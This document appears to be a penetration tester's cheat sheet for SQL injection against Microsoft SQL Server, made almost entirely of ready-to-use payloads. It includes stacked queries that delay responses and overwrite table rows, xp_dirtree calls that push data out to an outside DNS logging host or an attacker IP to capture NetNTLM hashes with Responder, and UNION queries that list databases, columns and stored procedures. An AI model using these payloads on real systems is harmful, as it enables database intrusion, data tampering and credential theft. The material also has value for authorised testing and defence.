MSSQL Injection
Not DB Administratorâ
Issuesâ
Latin1_General_CI_AS and SQL_Latin1_General_CP1_CI_AS
convert(varbinary,<column_name>)
Stack queryâ
a'; WAITFOR DELAY '00:00:10' --
a'; UPDATE <table> SET <column_name> = '<value>' WHERE id=<id>; --
tip
The share folder must be specified even if it does not exists!
http://requestbin.net/dns
Burp Collaborator
a';declare @q varchar(99);set @q='\\<test>.<XXX.d.requestbin.net>\<share>'; exec master.dbo.xp_dirtree @q;-- -
tip
If it works, it is possible to retrieve the NetNTLM hash listening with responder.
a';declare @q varchar(99);set @q='\\<ip>\<anything>'; exec master.dbo.xp_dirtree @q;-- -
List DBâ
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysdatabases -- -
List all columns where table name likeâ
a' union select 1,2,3,getdate(),5,6,table_name,column_name FROM information_schema.columns where table_name like '<user>' -- -
List proceduresâ
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysobjects WHERE name like 'sp%' -- -